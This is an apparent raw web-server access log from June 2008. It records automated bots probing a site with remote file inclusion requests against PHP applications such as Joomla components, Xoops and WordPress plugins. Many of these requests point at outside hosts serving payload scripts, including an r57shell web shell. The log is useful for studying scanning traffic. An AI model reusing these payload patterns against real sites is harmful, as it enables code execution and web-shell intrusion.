58.26.137.64 - - [17/Jun/2008:09:16:27 -0700] "GET /logs/access_080312.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
211.236.177.197 - - [17/Jun/2008:09:16:42 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
211.236.177.197 - - [17/Jun/2008:09:16:43 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
211.236.177.197 - - [17/Jun/2008:09:16:43 -0700] "GET /logs/access_080221.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
211.32.116.114 - - [17/Jun/2008:09:17:20 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
211.32.116.114 - - [17/Jun/2008:09:17:20 -0700] "GET /logs/access_080221.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
211.32.116.114 - - [17/Jun/2008:09:17:20 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
205.234.215.105 - - [17/Jun/2008:09:18:18 -0700] "GET /logs/access_080118.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
211.236.177.197 - - [17/Jun/2008:09:18:22 -0700] "GET /logs/access_080120.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
65.55.211.26 - - [17/Jun/2008:09:18:23 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.26 - - [17/Jun/2008:09:18:23 -0700] "GET /bikes/dteel/2008_01_26/?S=D HTTP/1.1" 200 6616 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.26 - - [17/Jun/2008:09:18:25 -0700] "GET /logs/access_080603.log HTTP/1.1" 200 1245184 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
74.6.18.228 - - [17/Jun/2008:09:18:33 -0700] "GET /logs/access_080116.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
61.222.167.228 - - [17/Jun/2008:09:19:23 -0700] "GET /logs/xGB.php?act=admin&do=http://superxsonic.net/id.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.252.133.12 - - [17/Jun/2008:09:19:25 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.dutadewata.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.252.133.12 - - [17/Jun/2008:09:19:25 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.dutadewata.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.222.167.228 - - [17/Jun/2008:09:19:29 -0700] "GET /xGB.php?act=admin&do=http://superxsonic.net/id.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.174.80.161 - - [17/Jun/2008:09:19:36 -0700] "GET /logs/access_080328.log/?mosConfig_absolute_path=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.174.80.161 - - [17/Jun/2008:09:19:42 -0700] "GET /logs/?mosConfig_absolute_path=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 200 52275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.174.80.161 - - [17/Jun/2008:09:19:43 -0700] "GET /?mosConfig_absolute_path=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 200 18437 "-" "libwww-perl/5.79" "www.dmulk.com"
200.30.73.117 - - [17/Jun/2008:09:20:14 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.km-rc.com//appserv/bot.txt?? HTTP/1.1" 200 50 "-" "libwww-perl/5.803" "dmulk.com"
200.30.73.117 - - [17/Jun/2008:09:20:15 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.km-rc.com//appserv/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "dmulk.com"
211.32.116.114 - - [17/Jun/2008:09:20:41 -0700] "GET /logs/access_080120.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
213.249.193.2 - - [17/Jun/2008:09:20:43 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.249.193.2 - - [17/Jun/2008:09:20:43 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.0.200.170 - - [17/Jun/2008:09:21:21 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
213.249.193.130 - - [17/Jun/2008:09:21:26 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=ftp:ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.249.193.2 - - [17/Jun/2008:09:21:26 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=ftp:ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.0.200.170 - - [17/Jun/2008:09:21:28 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
90.158.114.6 - - [17/Jun/2008:09:22:22 -0700] "GET /logs/access_080117.log//modules/xfsection/modify.php?dir_module=http://academic.kru.ac.th/sida6_4.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
90.158.114.6 - - [17/Jun/2008:09:22:22 -0700] "GET //modules/xfsection/modify.php?dir_module=http://academic.kru.ac.th/sida6_4.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
90.158.114.6 - - [17/Jun/2008:09:22:23 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://academic.kru.ac.th/sida6_4.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:09:22:26 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:09:22:26 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.119 - - [17/Jun/2008:09:23:28 -0700] "GET /errors.php?error=http://www.bicarabuku.com/mambots/system/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.0.200.170 - - [17/Jun/2008:09:23:31 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.0.200.170 - - [17/Jun/2008:09:23:37 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.139.226 - - [17/Jun/2008:09:23:45 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [17/Jun/2008:09:23:45 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
24.75.62.12 - - [17/Jun/2008:09:24:17 -0700] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://darkcrystal87.altervista.org/id_sin.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.18.228 - - [17/Jun/2008:09:24:42 -0700] "GET /tmp/?N=D HTTP/1.0" 200 2516 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
202.191.61.240 - - [17/Jun/2008:09:25:01 -0700] "GET /logs/index.php?redir=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
202.191.61.240 - - [17/Jun/2008:09:25:05 -0700] "GET /index.php?redir=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 200 18423 "-" "libwww-perl/5.812" "www.dmulk.com"
61.222.167.228 - - [17/Jun/2008:09:25:08 -0700] "GET /logs/xGB.php?act=admin&do=http://superxsonic.net/id.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.222.167.228 - - [17/Jun/2008:09:25:13 -0700] "GET /xGB.php?act=admin&do=http://superxsonic.net/id.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
192.231.226.10 - - [17/Jun/2008:09:25:25 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.dutadewata.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
192.231.226.10 - - [17/Jun/2008:09:25:25 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.dutadewata.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.0.200.170 - - [17/Jun/2008:09:26:09 -0700] "GET /logs/access_080226.log//components/com_calendar.php?absolute_path=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.190.202.198 - - [17/Jun/2008:09:26:14 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.youthsoroca.md/php-nuke/foto/safe.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.79.246.200 - - [17/Jun/2008:09:26:16 -0700] "GET /logs//modx/assets/images/paiement.php?sourcedir=http://icqbomber.110mb.com/files/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [17/Jun/2008:09:26:16 -0700] "GET //modx/assets/images/paiement.php?sourcedir=http://icqbomber.110mb.com/files/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
199.238.142.204 - - [17/Jun/2008:09:26:21 -0700] "GET /logs/access_080308.log/main.php?appserv_root=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "dmulk.com"
199.238.142.204 - - [17/Jun/2008:09:26:21 -0700] "GET /main.php?appserv_root=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "dmulk.com"
199.238.142.204 - - [17/Jun/2008:09:26:21 -0700] "GET /logs/main.php?appserv_root=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "dmulk.com"
199.238.142.204 - - [17/Jun/2008:09:26:23 -0700] "GET /logs/access_080313.log/main.php?appserv_root=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
199.238.142.204 - - [17/Jun/2008:09:26:24 -0700] "GET /main.php?appserv_root=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
199.238.142.204 - - [17/Jun/2008:09:26:24 -0700] "GET /logs/main.php?appserv_root=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
68.253.36.82 - - [17/Jun/2008:09:26:54 -0700] "GET /logs/access_071212.log HTTP/1.1" 200 89527 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)" "www.dmulk.com"
70.84.27.98 - - [17/Jun/2008:09:27:49 -0700] "GET /logs/access_080326.log//common/db.php?commonpath=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.27.98 - - [17/Jun/2008:09:27:49 -0700] "GET //common/db.php?commonpath=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.27.98 - - [17/Jun/2008:09:27:50 -0700] "GET /logs//common/db.php?commonpath=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.69.204.75 - - [17/Jun/2008:09:28:40 -0700] "GET /logs//contenido/cronjobs/move_old_stats.php?cfg[path][contenido]=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.73" "www.dmulk.com"
212.69.204.75 - - [17/Jun/2008:09:28:40 -0700] "GET //contenido/cronjobs/move_old_stats.php?cfg[path][contenido]=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.73" "www.dmulk.com"
84.18.207.64 - - [17/Jun/2008:09:28:47 -0700] "GET /logs//serweb//load_lang.php?_SERWEB[serwebdir]=http://189.20.64.27/cache/idrox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
84.18.207.64 - - [17/Jun/2008:09:28:48 -0700] "GET //serweb//load_lang.php?_SERWEB[serwebdir]=http://189.20.64.27/cache/idrox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.84.27.98 - - [17/Jun/2008:09:29:52 -0700] "GET /logs/access_080325.log//common/db.php?commonpath=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.117.140.139 - - [17/Jun/2008:09:30:16 -0700] "GET /logs/access_080110.log//wp-content/plugins/wordtube/error.php?error=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.117.140.139 - - [17/Jun/2008:09:30:16 -0700] "GET //wp-content/plugins/wordtube/error.php?error=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.117.140.139 - - [17/Jun/2008:09:30:16 -0700] "GET /logs//wp-content/plugins/wordtube/error.php?error=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.69.204.75 - - [17/Jun/2008:09:31:22 -0700] "GET /logs/access_071228.log//contenido/cronjobs/move_old_stats.php?cfg[path][contenido]=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.73" "www.dmulk.com"
212.69.204.75 - - [17/Jun/2008:09:31:22 -0700] "GET //contenido/cronjobs/move_old_stats.php?cfg[path][contenido]=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.73" "www.dmulk.com"
212.69.204.75 - - [17/Jun/2008:09:31:23 -0700] "GET /logs//contenido/cronjobs/move_old_stats.php?cfg[path][contenido]=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.73" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:09:31:33 -0700] "GET /logs/access_080326.log//common/db.php?commonpath=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:09:31:33 -0700] "GET //common/db.php?commonpath=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:09:31:33 -0700] "GET /logs//common/db.php?commonpath=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
212.69.204.75 - - [17/Jun/2008:09:31:36 -0700] "GET /logs/access_080124.log//contenido/cronjobs/move_old_stats.php?cfg[path][contenido]=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.73" "www.dmulk.com"
216.246.124.184 - - [17/Jun/2008:09:31:39 -0700] "GET /logs/access_080326.log//common/db.php?commonpath=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.246.124.184 - - [17/Jun/2008:09:31:40 -0700] "GET //common/db.php?commonpath=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.246.124.184 - - [17/Jun/2008:09:31:40 -0700] "GET /logs//common/db.php?commonpath=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.30.73.117 - - [17/Jun/2008:09:31:44 -0700] "GET ///ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.km-rc.com//appserv/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.74.158.86 - - [17/Jun/2008:09:32:03 -0700] "GET /logs/access_080429.log/scanhttp://bucetinha.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.146.102.38 - - [17/Jun/2008:09:32:05 -0700] "GET //errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.146.102.38 - - [17/Jun/2008:09:32:10 -0700] "GET /logs//errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.146.102.38 - - [17/Jun/2008:09:32:21 -0700] "GET /logs/access.log//errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.0.200.170 - - [17/Jun/2008:09:32:28 -0700] "GET /logs/access_080308.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
200.76.111.11 - - [17/Jun/2008:09:32:38 -0700] "GET /logs/access_080326.log//common/db.php?commonpath=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.76.111.11 - - [17/Jun/2008:09:32:38 -0700] "GET /logs/access_080326.log//common/db.php?commonpath=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.76.111.11 - - [17/Jun/2008:09:32:38 -0700] "GET //common/db.php?commonpath=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.76.111.11 - - [17/Jun/2008:09:32:38 -0700] "GET //common/db.php?commonpath=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.76.111.11 - - [17/Jun/2008:09:32:38 -0700] "GET /logs//common/db.php?commonpath=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.76.111.11 - - [17/Jun/2008:09:32:39 -0700] "GET /logs//common/db.php?commonpath=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
90.158.114.6 - - [17/Jun/2008:09:32:49 -0700] "GET /logs/access_080103.log//modules/xfsection/modify.php?dir_module=http://academic.kru.ac.th/sida6_4.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
202.71.102.187 - - [17/Jun/2008:09:32:49 -0700] "GET /logs/index.php?redir=http://fsm.upsi.edu.my//db/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.71.102.187 - - [17/Jun/2008:09:32:56 -0700] "GET /index.php?redir=http://fsm.upsi.edu.my//db/albid.txt?? HTTP/1.1" 200 18389 "-" "libwww-perl/5.805" "www.dmulk.com"
202.221.143.111 - - [17/Jun/2008:09:33:06 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.58.189.137 - - [17/Jun/2008:09:33:39 -0700] "GET /index.php?http://www.realmadrid.caucasus.net/r57shell.txt?? HTTP/1.1" 200 18367 "-" "libwww-perl/5.810" "www.dmulk.com"
216.246.124.184 - - [17/Jun/2008:09:34:19 -0700] "GET /logs/access_080325.log//common/db.php?commonpath=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.0.200.170 - - [17/Jun/2008:09:34:19 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.0.200.170 - - [17/Jun/2008:09:34:20 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.0.200.170 - - [17/Jun/2008:09:34:20 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:09:34:23 -0700] "GET /logs/access_080325.log//common/db.php?commonpath=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.0.200.170 - - [17/Jun/2008:09:34:33 -0700] "GET /logs/access_080308.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
74.0.200.170 - - [17/Jun/2008:09:34:38 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://http://www.freewebtown.com/scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
151.11.24.250 - - [17/Jun/2008:09:34:45 -0700] "GET //login.php?dir=http://www.emilylamont.com/mambots/editors/tinymce/scripts/tinymce/php??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
151.11.24.250 - - [17/Jun/2008:09:34:45 -0700] "GET /logs//login.php?dir=http://www.emilylamont.com/mambots/editors/tinymce/scripts/tinymce/php??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
80.190.202.198 - - [17/Jun/2008:09:34:47 -0700] "GET /logs/access_071216.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.youthsoroca.md/php-nuke/foto/safe.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.190.202.198 - - [17/Jun/2008:09:34:47 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.youthsoroca.md/php-nuke/foto/safe.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.76.111.11 - - [17/Jun/2008:09:34:53 -0700] "GET /logs/access_080325.log//common/db.php?commonpath=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.76.111.11 - - [17/Jun/2008:09:35:01 -0700] "GET /logs/access_080325.log//common/db.php?commonpath=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.205.67.205 - - [17/Jun/2008:09:35:01 -0700] "GET /logs/access_080212.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.67.205 - - [17/Jun/2008:09:35:01 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.67.205 - - [17/Jun/2008:09:35:01 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.67.205 - - [17/Jun/2008:09:35:02 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.102.242.34 - - [17/Jun/2008:09:35:08 -0700] "GET /logs/access_080212.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.102.242.34 - - [17/Jun/2008:09:35:09 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.102.242.34 - - [17/Jun/2008:09:35:09 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
